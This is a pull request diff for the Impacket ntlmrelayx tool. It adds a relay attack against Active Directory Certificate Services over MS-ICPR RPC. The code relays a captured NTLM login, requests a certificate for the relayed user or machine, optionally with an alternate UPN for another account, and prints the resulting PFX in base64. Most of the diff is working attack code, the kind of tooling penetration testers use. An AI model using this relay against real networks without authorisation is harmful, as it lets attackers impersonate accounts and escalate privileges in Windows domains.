### PR TITLE
Adds relay to ICPR over RPC

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -163,6 +163,7 @@ def start_servers(options, threads):
         c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
         c.setSMB2Support(options.smb2support)
         c.setSMBChallenge(options.ntlmchallenge)
+        c.setSMBRPCAttack(options.rpc_attack)
         c.setInterfaceIp(options.interface_ip)
         c.setExploitOptions(options.remove_mic, options.remove_target)
         c.setWebDAVOptions(options.serve_image)
@@ -290,10 +291,11 @@ if __name__ == '__main__':
     smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
                                      'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
     smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
+    smboptions.add_argument('--rpc-attack', action='store', choices=[None, "TSCH", "ICPR"], required=False, default=None, help='Select the attack to perform over RPC over named pipes.')
 
     #RPC arguments
     rpcoptions = parser.add_argument_group("RPC client options")
-    rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
+    rpcoptions.add_argument('-rpc-mode', choices=["TSCH", "ICPR"], default="TSCH", help='Protocol to attack')
     rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
     rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
         help='Use this credential to authenticate to SMB (low-privilege account)')

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -155,7 +155,7 @@ def start_servers(options, threads):
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
         c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid)
-        c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
+        c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port, options.icpr_ca_name)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
@@ -301,6 +301,7 @@ if __name__ == '__main__':
         help='Use this credential to authenticate to SMB (low-privilege account)')
     rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
     rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
+    rpcoptions.add_argument('-icpr-ca-name', action='store', default="", help='Name of the CA for ICPR attack')
 
     #MSSQL arguments
     mssqloptions = parser.add_argument_group("MSSQL client options")

--- a/impacket/dcerpc/v5/icpr.py
+++ b/impacket/dcerpc/v5/icpr.py
@@ -1,0 +1,209 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   [MS-ICPR] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#
+# Author:
+#   Sylvain Heiniger @(sploutchy) / Compass Security (https://www.compass-security.com)
+#   based on the code of Oliver Lyak (@ly4k_)
+#
+# TODO:
+#   - Testcases
+#
+import base64
+from typing import List
+
+from impacket import hresult_errors, LOG
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, NULL, PBYTE, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
+from impacket.dcerpc.v5.nrpc import checkNullString
+from impacket.dcerpc.v5.rpcrt import DCERPC_v5, DCERPCException
+from impacket.krb5 import constants
+from impacket.uuid import uuidtup_to_bin
+
+
+MSRPC_UUID_ICPR = uuidtup_to_bin(("91ae6020-9e3c-11cf-8d7c-00aa00c091be", "0.0"))
+
+"""
+// RFC 4556
+77: "KDC_ERR_INCONSISTENT_KEY_PURPOSE"
+78: "KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED"
+79: "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED"
+80: "KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED"
+81: "KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED"
+ // RFC 6113
+90: "KDC_ERR_PREAUTH_EXPIRED"
+91: "KDC_ERR_MORE_PREAUTH_DATA_REQUIRED"
+92: "KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET"
+93: "KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS"
+"""
+
+KRB5_ERROR_MESSAGES = constants.ERROR_MESSAGES
+if 77 not in KRB5_ERROR_MESSAGES:
+    KRB5_ERROR_MESSAGES.update(
+        {
+            77: (
+                "KDC_ERR_INCONSISTENT_KEY_PURPOSE",
+                "Certificate cannot be used for PKINIT client authentication",
+            ),
+            78: (
+                "KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED",
+                "Digest algorithm for the public key in the certificate is not acceptable by the KDC",
+            ),
+            79: (
+                "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED",
+                "The paChecksum filed in the request is not present",
+            ),
+            80: (
+                "KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED",
+                "The digest algorithm used by the id-pkinit-authData is not acceptable by the KDC",
+            ),
+            81: (
+                "KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED",
+                "The KDC does not support the public key encryption key delivery method",
+            ),
+            90: (
+                "KDC_ERR_PREAUTH_EXPIRED",
+                "The conversation is too old and needs to restart",
+            ),
+            91: (
+                "KDC_ERR_MORE_PREAUTH_DATA_REQUIRED",
+                "Additional pre-authentication required",
+            ),
+            92: (
+                "KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET",
+                "KDC cannot accommodate requested padata element",
+            ),
+            93: ("KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS", "Unknown critical option"),
+        }
+    )
+
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__(self) -> str:
+        self.error_code &= 0xFFFFFFFF
+        error_msg = translate_error_code(self.error_code)
+        return "RequestSessionError: %s" % error_msg
+
+
+################################################################################
+# STRUCTURES
+################################################################################
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/d6bee093-d862-4122-8f2b-7b49102097dc
+# [MS-WCCE] 2.2.2.2
+class CERTTRANSBLOB(NDRSTRUCT):
+    structure = (
+        ("cb", ULONG),
+        ("pb", PBYTE),
+    )
+
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
+class CertServerRequest(NDRCALL):
+    opnum = 0
+    structure = (
+        ("dwFlags", DWORD),
+        ("pwszAuthority", LPWSTR),
+        ("pdwRequestId", DWORD),
+        ("pctbAttribs", CERTTRANSBLOB),
+        ("pctbRequest", CERTTRANSBLOB),
+    )
+
+
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
+class CertServerRequestResponse(NDRCALL):
+    structure = (
+        ("pdwRequestId", DWORD),
+        ("pdwDisposition", ULONG),
+        ("pctbCert", CERTTRANSBLOB),
+        ("pctbEncodedCert", CERTTRANSBLOB),
+        ("pctbDispositionMessage", CERTTRANSBLOB),
+    )
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+@staticmethod
+def translate_error_code(error_code: int) -> str:
+    error_code &= 0xFFFFFFFF
+    if error_code in hresult_errors.ERROR_MESSAGES:
+        error_msg_short = hresult_errors.ERROR_MESSAGES[error_code][0]
+        error_msg_verbose = hresult_errors.ERROR_MESSAGES[error_code][1]
+        return "code: 0x%x - %s - %s" % (
+            error_code,
+            error_msg_short,
+            error_msg_verbose,
+        )
+    else:
+        return "unknown error code: 0x%x" % error_code
+
+@staticmethod
+def hCertServerRequest(
+    dce: DCERPC_v5,
+    csr: bytes,
+    attributes: List[str],
+    request_id: int = 0,
+    ca: str = ""
+) -> str:
+    attribs = checkNullString("\n".join(attributes)).encode("utf-16le")
+    pctb_attribs = CERTTRANSBLOB()
+    pctb_attribs["cb"] = len(attribs)
+    pctb_attribs["pb"] = attribs
+
+    pctb_request = CERTTRANSBLOB()
+    pctb_request["cb"] = len(csr)
+    pctb_request["pb"] = csr
+
+    request = CertServerRequest()
+    request["dwFlags"] = 0
+    request["pwszAuthority"] = checkNullString(ca)
+    request["pdwRequestId"] = request_id
+    request["pctbAttribs"] = pctb_attribs
+    request["pctbRequest"] = pctb_request
+
+    response = dce.request(request)
+
+    error_code = response["pdwDisposition"]
+    request_id = response["pdwRequestId"]
+
+    if error_code == 3:
+        LOG.info("Successfully requested certificate")
+    else:
+        if error_code == 5:
+            LOG.warning("Certificate request is pending approval")
+        else:
+            error_msg = translate_error_code(error_code)
+            if "unknown error code" in error_msg:
+                LOG.error(
+                    "Got unknown error while trying to request certificate: (%s): %s"
+                    % (
+                        error_msg,
+                        b"".join(response["pctbDispositionMessage"]["pb"]).decode(
+                            "utf-16le"
+                        ),
+                    )
+                )
+            else:
+                LOG.error(
+                    "Got error while trying to request certificate: %s" % error_msg
+                )
+
+    LOG.info("Request ID is %d" % request_id)
+
+    return b"".join(response["pctbEncodedCert"]["pb"])

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
@@ -81,7 +81,8 @@ class ADCSAttack:
         if self.config.altName:
             LOG.info("This certificate can also be used for user : {}".format(self.config.altName))
 
-    def generate_csr(self, key, CN, altName):
+    @staticmethod
+    def generate_csr(key, CN, altName, csr_type = crypto.FILETYPE_PEM):
         LOG.info("Generating CSR...")
         req = crypto.X509Req()
         req.get_subject().CN = CN
@@ -93,16 +94,18 @@ class ADCSAttack:
         req.set_pubkey(key)
         req.sign(key, "sha256")
 
-        return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req)
+        return crypto.dump_certificate_request(csr_type, req)
 
-    def generate_pfx(self, key, certificate):
-        certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
+    @staticmethod
+    def generate_pfx(key, certificate, cert_type = crypto.FILETYPE_PEM):
+        certificate = crypto.load_certificate(cert_type, certificate)
         p12 = crypto.PKCS12()
         p12.set_certificate(certificate)
         p12.set_privatekey(key)
         return p12.export()
 
-    def generate_certattributes(self, template, altName):
+    @staticmethod
+    def generate_certattributes(template, altName):
 
         if altName:
             return "CertificateTemplate:{}%0d%0aSAN:upn={}".format(template, altName)

--- a/impacket/examples/ntlmrelayx/attacks/rpcattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/rpcattack.py
@@ -141,9 +141,14 @@ class ICPRRPCAttack:
 
         LOG.info("Getting certificate...")
         try:
-            certificate = icpr.hCertServerRequest(self.dce, csr, attributes, ca="DC1-CA")
+            certificate = icpr.hCertServerRequest(self.dce, csr, attributes, ca=self.config.icpr_ca_name)
         except DCERPCSessionError as e:
-            LOG.error("Error occured while getting certificate: %s Maybe encryption is enforced?" % e)
+            if e.error_code == 0x80070057:
+                LOG.error("Error occured while getting certificate: %s Check your CA name?" % e)
+            elif e.error_code == 0x80070005:
+                LOG.error("Error occured while getting certificate: %s Maybe encryption is enforced?" % e)
+            else:
+                LOG.error("Unknown error occured while getting certificate: %s" % e)
             return
 
         ELEVATED.append(self.username)

--- a/impacket/examples/ntlmrelayx/attacks/rpcattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/rpcattack.py
@@ -8,19 +8,28 @@
 #
 # Authors:
 #   Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#   Sylvain Heiniger @(sploutchy) / Compass Security (https://www.compass-security.com)
 #   Based on @agsolino and @_dirkjan code
 #
-
+import base64
 import time
 import string
 import random
 
+from OpenSSL import crypto
+
 from impacket import LOG
-from impacket.dcerpc.v5 import tsch
+from impacket.dcerpc.v5 import tsch, icpr
 from impacket.dcerpc.v5.dtypes import NULL
+from impacket.dcerpc.v5.icpr import DCERPCSessionError
 from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
+from impacket.examples.ntlmrelayx.attacks.httpattacks.adcsattack import ADCSAttack
 
 PROTOCOL_ATTACK_CLASS = "RPCAttack"
+
+# cache already attacked clients
+ELEVATED = []
+
 
 class TSCHRPCAttack:
     def _xml_escape(self, data):
@@ -107,6 +116,42 @@ class TSCHRPCAttack:
         LOG.info('Completed!')
 
 
+class ICPRRPCAttack:
+    def _run(self):
+        key = crypto.PKey()
+        key.generate_key(crypto.TYPE_RSA, 4096)
+
+        if self.username in ELEVATED:
+            LOG.info('Skipping user %s since attack was already performed' % self.username)
+            return
+
+        current_template = self.config.template
+        if current_template is None:
+            current_template = "Machine" if self.username.endswith("$") else "User"
+
+        LOG.debug("Generating a CSR for user %s and template %s" % (self.username, current_template))
+
+        csr = ADCSAttack.generate_csr(key, self.username, self.config.altName, crypto.FILETYPE_ASN1)
+        LOG.info("CSR generated!")
+
+        attributes = ["CertificateTemplate:%s" % current_template]
+
+        if self.config.altName is not None:
+            attributes.append("SAN:upn=%s" % self.config.altName)
+
+        LOG.info("Getting certificate...")
+        try:
+            certificate = icpr.hCertServerRequest(self.dce, csr, attributes, ca="DC1-CA")
+        except DCERPCSessionError as e:
+            LOG.error("Error occured while getting certificate: %s Maybe encryption is enforced?" % e)
+            return
+
+        ELEVATED.append(self.username)
+
+        certificate_store = ADCSAttack.generate_pfx(key, certificate, crypto.FILETYPE_ASN1)
+        LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store)))
+
+
 class RPCAttack(ProtocolAttack, TSCHRPCAttack):
     PLUGIN_NAMES = ["RPC"]
 
@@ -115,15 +160,17 @@ class RPCAttack(ProtocolAttack, TSCHRPCAttack):
         self.dce = dce
         self.rpctransport = dce.get_rpc_transport()
         self.stringbinding = self.rpctransport.get_stringbinding()
+        self.endpoint = config.rpc_mode
 
     def run(self):
-        # Here PUT YOUR CODE!
-
-        # Assume the endpoint is TSCH
-        # TODO: support relaying RPC to different endpoints
-        # TODO: support for providing a shell
-        # TODO: support for getting an output
-        if self.config.command is not None:
-            TSCHRPCAttack._run(self)
+        if self.endpoint == "TSCH":
+            # TODO: support for providing a shell
+            # TODO: support for getting an output
+            if self.config.command is not None:
+                TSCHRPCAttack._run(self)
+            else:
+                LOG.error("No command provided to attack")
+        elif self.endpoint == "ICPR":
+            ICPRRPCAttack._run(self)
         else:
-            LOG.error("No command provided to attack")
+            raise NotImplementedError("Not implemented!")

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -63,6 +63,7 @@ class NTLMRelayxConfig:
         self.interactive = False
         self.enumLocalAdmins = False
         self.SMBServerChallenge = None
+        self.rpc_attack = None
 
         # RPC options
         self.rpc_mode = None
@@ -108,6 +109,9 @@ class NTLMRelayxConfig:
 
     def setSMBChallenge(self, value):
         self.SMBServerChallenge = value
+
+    def setSMBRPCAttack(self, value):
+        self.rpc_attack = value
 
     def setSMB2Support(self, value):
         self.smb2support = value

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -191,7 +191,7 @@ class NTLMRelayxConfig:
     def setMSSQLOptions(self, queries):
         self.queries = queries
 
-    def setRPCOptions(self, rpc_mode, rpc_use_smb, auth_smb, hashes_smb, rpc_smb_port):
+    def setRPCOptions(self, rpc_mode, rpc_use_smb, auth_smb, hashes_smb, rpc_smb_port, icpr_ca_name):
         self.rpc_mode = rpc_mode
         self.rpc_use_smb = rpc_use_smb
         self.smbdomain, self.smbuser, self.smbpass = parse_credentials(auth_smb)
@@ -203,6 +203,7 @@ class NTLMRelayxConfig:
             self.smbnthash = ''
 
         self.rpc_smb_port = rpc_smb_port
+        self.icpr_ca_name = icpr_ca_name
 
     def setInteractive(self, interactive):
         self.interactive = interactive


### PR DESCRIPTION
Adds the ability to relay to ICPR over RPC to request a certificate for the relayed user (analog to AD CS ESC8).

See https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/ for more information.